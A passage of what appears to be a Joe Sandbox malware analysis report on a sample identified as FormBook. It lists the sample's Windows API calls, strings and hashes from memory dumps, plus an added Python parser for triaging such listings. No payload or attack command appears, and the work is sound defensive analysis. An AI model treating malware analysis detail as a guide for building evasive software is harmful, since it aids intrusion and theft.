                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Prop$CallProcRemoveWindow
                                      • String ID:
                                      • API String ID: 2276450057-0
                                      • Opcode ID: a1a769ed7ecc1795f4146dfdc517d9978fb74cb931c550b9e1de25835f62459d
                                      • Instruction ID: f2913eb92510d0de6212f23a4df99b9d2da70319acdf26a8877a75fc8859964c
                                      • Opcode Fuzzy Hash: a1a769ed7ecc1795f4146dfdc517d9978fb74cb931c550b9e1de25835f62459d
                                      • Instruction Fuzzy Hash: 22614B766443156BF220AB14ED44FAF7758EB86362F500537FA00933A2DBAC9D05C6BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0044D085: TlsGetValue.KERNEL32(00471280,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4,?,00000000,?,004436DC,00000000,00000000,00000000,00000000), ref: 0044D0C4
                                      • CallNextHookEx.USER32(?,00000003,?,?), ref: 00444C28
                                      • GetClassLongA.USER32 ref: 00444C6F
                                      • GlobalGetAtomNameA.KERNEL32 ref: 00444C9B
                                      • lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_0004BFA0), ref: 00444CAA
                                      • GetWindowLongA.USER32 ref: 00444D1D
                                      • SetWindowLongA.USER32(?,000000FC,00000000), ref: 00444D3E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
                                      • String ID: AfxOldWndProc423$ime
                                      • API String ID: 3731301195-104836986
                                      • Opcode ID: 40709cd23be8d8c9259912a349a504ca242b8aae11d90bd81e16fd574dd5ef31
                                      • Instruction ID: 2d2f466404bbe2e7ee92028e0a8c5fff2ffad6bdabc7e2856b2558698f5b7ad4
                                      • Opcode Fuzzy Hash: 40709cd23be8d8c9259912a349a504ca242b8aae11d90bd81e16fd574dd5ef31
                                      • Instruction Fuzzy Hash: 5651E371900215ABEB119F24DC48BAF7BB8FF85365F144626F919A72A2C738DD40CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00446FC7: GetWindowLongA.USER32 ref: 00446FD3
                                      • GetParent.USER32(?), ref: 004466B3
                                      • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004466D6
                                      • GetWindowRect.USER32 ref: 004466EF
                                      • GetWindowLongA.USER32 ref: 00446702
                                      • CopyRect.USER32 ref: 0044674F
                                      • CopyRect.USER32 ref: 00446759
                                      • GetWindowRect.USER32 ref: 00446762
                                      • CopyRect.USER32 ref: 0044677E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                      • String ID: ($@
                                      • API String ID: 808654186-1311469180
                                      • Opcode ID: fda55c1c2b3b7bd705ea99a6d160d99963d51d7286166a209f48fc4ba0d4d20a
                                      • Instruction ID: 6e6e92ef86b245a170319472d85748aa6982e8d49233734fb95fe6a209e82997
                                      • Opcode Fuzzy Hash: fda55c1c2b3b7bd705ea99a6d160d99963d51d7286166a209f48fc4ba0d4d20a
                                      • Instruction Fuzzy Hash: 1051A571E00219ABEB10DBA8DC85FEEBBBDAF45314F164126F901F3291D634ED058B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(USER32,00000000,?,76925D80,0042D411,?,?,?,?,?,?,?,00446770,00000000,00000002,00000028), ref: 0042D2FA
                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0042D312
                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042D323
                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0042D334
                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0042D345
                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0042D356
                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042D367
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                      • API String ID: 667068680-2376520503
                                      • Opcode ID: 9d4718986dcc9b03da3de3d820c5593d0a0252a0324ee13543a534e0df81d892
                                      • Instruction ID: 4c9ef30fbcf4defc4eba49f941341b31a008136b44c5abc2490ae2287f3332ab
                                      • Opcode Fuzzy Hash: 9d4718986dcc9b03da3de3d820c5593d0a0252a0324ee13543a534e0df81d892
                                      • Instruction Fuzzy Hash: C41172B1A01625DAA350EF35ACC052EBAA4F20CB457A8083FD508D2292C7B844C98B5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%
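
The entries above record each function's API usage in a fixed textual form: "Func.MODULE(args), ref: address", with "Part of subcall function ADDR:" prefixed on calls made by a callee, and a "String ID:" line listing the string literals the function touches joined by "$". The entry at 0042D2FA is the kind of thing worth extracting mechanically: the sample looks up USER32 and resolves GetSystemMetrics, MonitorFromWindow, MonitorFromRect, MonitorFromPoint, EnumDisplayMonitors and GetMonitorInfoA through GetProcAddress, which matches the multimon.h stub pattern of MFC-era applications probing for APIs absent on older Windows rather than anything specific to the FormBook payload. The following parser is an added example and not part of this Joe Sandbox report; its helper names are its own, and its sample input is constructed from lines copied out of the entries above.

```python
"""Parse the per-function API listings of a Joe Sandbox-style report.

Added example; not part of the original report. It reads lines of the form
    • Func.MODULE(arg,arg,...), ref: ADDRESS
    • Part of subcall function ADDR: Func.MODULE(...), ref: ADDRESS
    • String ID: s1$s2$s3
and turns them into records that can be counted and searched, e.g. to list
which symbols the sample resolves at runtime through GetProcAddress.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# One API call line. The bullet, the "Part of subcall function" prefix and
# the argument list are all optional so every variant seen in the report
# matches ("GetSystemMetrics.USER32 ref: 00441079" has no argument list).
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<callee>[0-9A-F]{8}):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
STRING_ID_LINE = re.compile(r"^\s*•?\s*String ID:\s*(?P<ids>.*)$")
HEX32 = re.compile(r"^[0-9A-F]{8}$")


@dataclass(frozen=True)
class ApiCall:
    func: str
    module: str
    args: tuple[str, ...]
    ref: str                      # address of the call site
    callee: Optional[str] = None  # set when listed under "Part of subcall function"


def parse_listing(text: str) -> tuple[list[ApiCall], list[str]]:
    """Return (api calls, string literals) found in a report fragment."""
    calls: list[ApiCall] = []
    strings: list[str] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw = m.group("args") or ""
            args = tuple(a.strip() for a in raw.split(",")) if raw else ()
            calls.append(ApiCall(m.group("func"), m.group("module"), args,
                                 m.group("ref"), m.group("callee")))
            continue
        m = STRING_ID_LINE.match(line)
        if m and m.group("ids").strip():
            strings.extend(s for s in m.group("ids").split("$") if s)
    return calls, strings


def literal_args(call: ApiCall) -> list[str]:
    """Arguments the disassembler resolved to a string, not a number or '?'."""
    return [a for a in call.args if a != "?" and not HEX32.match(a)]


def dynamically_resolved(calls: list[ApiCall]) -> list[str]:
    """Symbol names passed as the second argument of GetProcAddress."""
    names = []
    for c in calls:
        if c.func == "GetProcAddress" and len(c.args) >= 2:
            name = c.args[1]
            if name != "?" and not HEX32.match(name):
                names.append(name)
    return names


def module_histogram(calls: list[ApiCall]) -> Counter:
    """How many listed call sites target each module (KERNEL32, USER32, ...)."""
    return Counter(c.module for c in calls)


# Constructed sample: lines copied from the report entries above.
SAMPLE = """\
• GetModuleHandleA.KERNEL32(USER32,00000000,?,76925D80,0042D411,?,?,?,?,?,?,?,00446770,00000000,00000002,00000028), ref: 0042D2FA
• GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0042D312
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042D323
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0042D334
• GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0042D345
• GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0042D356
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042D367
  • Part of subcall function 004402C0: SetBkColor.GDI32(?), ref: 004402DD
• GetSystemMetrics.USER32 ref: 00441079
• lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_0004BFA0), ref: 00444CAA
• String ID: AfxOldWndProc423$ime
"""


def summarize(text: str = SAMPLE) -> dict:
    """Triage summary of one or more pasted report entries."""
    calls, strings = parse_listing(text)
    return {
        "calls": len(calls),
        "modules": dict(module_histogram(calls)),
        "resolved_at_runtime": dynamically_resolved(calls),
        "subcall_refs": [c.ref for c in calls if c.callee],
        "strings": strings,
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print(f"{key}: {value}")
```

Paste any number of entries into the input; the "Download File" link text and the Memory Dump Source lines simply fail to match and are ignored. The runtime-resolved symbol list is the useful triage output: a loader that resolves its real imports by name shows up here with network or injection APIs, whereas this entry only yields the multi-monitor set.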

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Focus$MessageParentStateWindow$BeepDialogItemNext
                                      • String ID:
                                      • API String ID: 741152546-0
                                      • Opcode ID: 38580c3679820c58698e1c370fd1a2775eacbfda56565cb2d3e8b230350ba044
                                      • Instruction ID: cfcce112013b3be1b1ae25183199dbe7e74a8ba5b1e4c831b6a49819f93dfb68
                                      • Opcode Fuzzy Hash: 38580c3679820c58698e1c370fd1a2775eacbfda56565cb2d3e8b230350ba044
                                      • Instruction Fuzzy Hash: 11A1E131900215ABDF24AF65C846BEF7BA5EF8D355F10602BF801A7661CB3CFD418A69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • EnterCriticalSection.KERNEL32(00472D20,76922D10,74E32E90,?,?,?,?,?,?,?,?,?,?,?,?,004405A7), ref: 00440FA7
                                      • GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 00440FD0
                                      • lstrcmpiA.KERNEL32(?,kanji,?,?,?,?,?,?,?,?,?,?,?,?,004405A7), ref: 00440FE2
                                      • GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 00441005
                                      • lstrcmpiA.KERNEL32(?,hangeul,?,?,?,?,?,?,?,?,?,?,?,?,004405A7), ref: 00441011
                                      • LeaveCriticalSection.KERNEL32(00472D20,?,?,?,?,?,?,?,?,?,?,?,?,004405A7), ref: 00441023
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
                                      • String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
                                      • API String ID: 1105401458-111014456
                                      • Opcode ID: a27779b9088efbc9adc50235863c355637d7cb4030b0b9654f1e0e73a05b68e6
                                      • Instruction ID: 18b73ee476673299e654731a5ea524e4a200d5d967f9c927f06438e4b5427abb
                                      • Opcode Fuzzy Hash: a27779b9088efbc9adc50235863c355637d7cb4030b0b9654f1e0e73a05b68e6
                                      • Instruction Fuzzy Hash: 3901473524034579E220AB24FC01F8B3FD8D764B45F144032F688E35B2FAB8954C96AF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(?,00460638), ref: 0044ED5B
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 0044ED80
                                      • SysAllocString.OLEAUT32(?), ref: 0044ED86
                                      • lstrlenA.KERNEL32(?,00460638), ref: 0044EDAD
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 0044EDD2
                                      • SysAllocString.OLEAUT32(?), ref: 0044EDD8
                                      • lstrlenA.KERNEL32(?,0000F108,?,00000100,0045FA30,00460638), ref: 0044EE35
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 0044EE5A
                                      • SysAllocString.OLEAUT32(?), ref: 0044EE60
                                      • lstrlenA.KERNEL32(?,?,?), ref: 0044EE85
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?), ref: 0044EEAA
                                      • SysAllocString.OLEAUT32(?), ref: 0044EEB0
                                      • lstrlenA.KERNEL32(?,?,?), ref: 0044EEDC
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,?), ref: 0044EEFF
                                      • SysAllocString.OLEAUT32(00000000), ref: 0044EF05
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: AllocByteCharMultiStringWidelstrlen
                                      • String ID:
                                      • API String ID: 792254170-0
                                      • Opcode ID: 0e82886fb6a36f6c9a399b1dd155bc9247894e4d6762e40fed9c40cc3b8de5d9
                                      • Instruction ID: 66b54e2606957aae5e2e2c8e3ebc3aafc35a25c3b732139ee8d0380cbe776d4c
                                      • Opcode Fuzzy Hash: 0e82886fb6a36f6c9a399b1dd155bc9247894e4d6762e40fed9c40cc3b8de5d9
                                      • Instruction Fuzzy Hash: 05714C70900209BFDB10DFA6C84599EBBA4FF09360F10859AF814DB361D739CA42CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowLongA.USER32 ref: 004408FD
                                      • RemovePropA.USER32 ref: 00440933
                                      • SetWindowLongA.USER32(?,000000FC,00000000), ref: 00440939
                                      • RemovePropA.USER32 ref: 00440967
                                      • SetWindowLongA.USER32(?,000000FC,00000000), ref: 0044096D
                                      • GetWindow.USER32(?,00000005), ref: 004409C2
                                      • GetWindow.USER32(00000000,00000002), ref: 004409D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Window$Long$PropRemove
                                      • String ID: @-G
                                      • API String ID: 3256693057-1196022286
                                      • Opcode ID: 8e7ab8488151ab238c578b1839cd8e3be53bed05b361f59f79c4f0409ef4c09f
                                      • Instruction ID: 256cad188e55339d907f7dcb71a73d6fb99225b7caf1bbdb56b15a4cf5a7d02f
                                      • Opcode Fuzzy Hash: 8e7ab8488151ab238c578b1839cd8e3be53bed05b361f59f79c4f0409ef4c09f
                                      • Instruction Fuzzy Hash: 2D213AA71145156AF711A7786C00EBF229CDB8A325B110136FA08D2263FBB8CC5247BD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
                                      • String ID: edit
                                      • API String ID: 4088303749-2167791130
                                      • Opcode ID: 9ca7a60e8d51135fe90e038251a5d71b7edf98906b42dbe3d035c0c993d2aa8e
                                      • Instruction ID: a19d20411be811070a978075a2afc8035fbec320119771eae87b39da7784bf41
                                      • Opcode Fuzzy Hash: 9ca7a60e8d51135fe90e038251a5d71b7edf98906b42dbe3d035c0c993d2aa8e
                                      • Instruction Fuzzy Hash: AD2181661015126AA350BB79AC04FBF22DC9F49745B004531FE08D2632F768CD4297BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 0044F044
                                      • VariantClear.OLEAUT32(?), ref: 0044F2E7
                                      • VariantClear.OLEAUT32(?), ref: 0044F30E
                                      • SysFreeString.OLEAUT32(00000000), ref: 0044F372
                                      • SysFreeString.OLEAUT32(?), ref: 0044F387
                                      • SysFreeString.OLEAUT32(?), ref: 0044F39C
                                      • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 0044F3D7
                                      • VariantClear.OLEAUT32(?), ref: 0044F3E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Variant$ClearFreeString$ChangeTypelstrlen
                                      • String ID:
                                      • API String ID: 3956376494-0
                                      • Opcode ID: 2d49c0045146ee641043d69e4850d90746c89de475d310f7d13373f4d89ee691
                                      • Instruction ID: e42b9aba9f91c3a64b8849c904713d4d33eee83e1785caca611516527b1e21e8
                                      • Opcode Fuzzy Hash: 2d49c0045146ee641043d69e4850d90746c89de475d310f7d13373f4d89ee691
                                      • Instruction Fuzzy Hash: 56E1BF7590020ADFEF10DFA8C880AAEBBB4FF44304F24456AF911A7261D779AD15CF69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?), ref: 00443474
                                      • GetProcAddress.KERNEL32(00000000,DisableThreadLibraryCalls), ref: 00443480
                                      • EnterCriticalSection.KERNEL32(00472D20), ref: 0044349C
                                      • GetVersion.KERNEL32 ref: 004434AE
                                      • GetSystemMetrics.USER32 ref: 004434F2
                                      • GetSystemMetrics.USER32 ref: 004434FC
                                      • GetSystemMetrics.USER32 ref: 00443506
                                      • GetSystemMetrics.USER32 ref: 0044350F
                                      • LeaveCriticalSection.KERNEL32(00472D20), ref: 0044351B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: MetricsSystem$CriticalSection$AddressEnterHandleLeaveModuleProcVersion
                                      • String ID: DisableThreadLibraryCalls$KERNEL32.DLL
                                      • API String ID: 1414939872-3863293605
                                      • Opcode ID: a7bcca54881bc7c3514cb91cd31bd39b35042531d1c1c857726edbaab2f92e8f
                                      • Instruction ID: 20908dd0915890d9e79644aaab1c60c6af654ecee896380fef3af270d58e08bd
                                      • Opcode Fuzzy Hash: a7bcca54881bc7c3514cb91cd31bd39b35042531d1c1c857726edbaab2f92e8f
                                      • Instruction Fuzzy Hash: 6E117370840315ABE720AF64AE0978B3FA0EF04706F04843BF54997270E7B98584CF8E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CompareStringW.KERNEL32(00000000,00000000,004614D0,00000001,004614D0,00000001,00000000,02370E7C,00429BC6,0000000B,?,0043A363,00435D0D), ref: 0043FADC
                                      • CompareStringA.KERNEL32(00000000,00000000,004614CC,00000001,004614CC,00000001,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FAF9
                                      • CompareStringA.KERNEL32(00429BC6,00000000,00000000,00435B80,?,?,00000000,02370E7C,00429BC6,0000000B,?,0043A363,00435D0D), ref: 0043FB57
                                      • GetCPInfo.KERNEL32(?,00000000,00000000,02370E7C,00429BC6,0000000B,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FBA8
                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FC27
                                      • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,]C,?,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FC88
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,FFFFFFFF,00000000,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FC9B
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,FFFFFFFF,?,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FCE7
                                      • CompareStringW.KERNEL32(?,?,00429A3B,FFFFFFFF,?,00000000,?,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FCFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: ByteCharCompareMultiStringWide$Info
                                      • String ID: ]C
                                      • API String ID: 1651298574-391739762
                                      • Opcode ID: 79e58333b598a3e7eaf2ec5a4f3438e0575bcd63f31c7c688008162cbbab562c
                                      • Instruction ID: 000e64e140063156ac67654bd188ec8a40f4037c3464a99ccbf11fa4f3be0811
                                      • Opcode Fuzzy Hash: 79e58333b598a3e7eaf2ec5a4f3438e0575bcd63f31c7c688008162cbbab562c
                                      • Instruction Fuzzy Hash: 2671CDB1D00249ABCF218F54DC55AEBBFBAEB0D300F14113BF951A6260D3399C59DB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • EnterCriticalSection.KERNEL32(00472D20,?,0044067F), ref: 00441226
                                      • GlobalDeleteAtom.KERNEL32 ref: 00441262
                                      • GlobalDeleteAtom.KERNEL32 ref: 0044127D
                                      • GlobalDeleteAtom.KERNEL32 ref: 00441290
                                      • GlobalDeleteAtom.KERNEL32 ref: 004412A3
                                      • GlobalDeleteAtom.KERNEL32 ref: 004412B6
                                      • GlobalDeleteAtom.KERNEL32 ref: 004412C9
                                      • GlobalDeleteAtom.KERNEL32 ref: 004412DC
                                      • LeaveCriticalSection.KERNEL32(00472D20,?,0044067F), ref: 004412ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
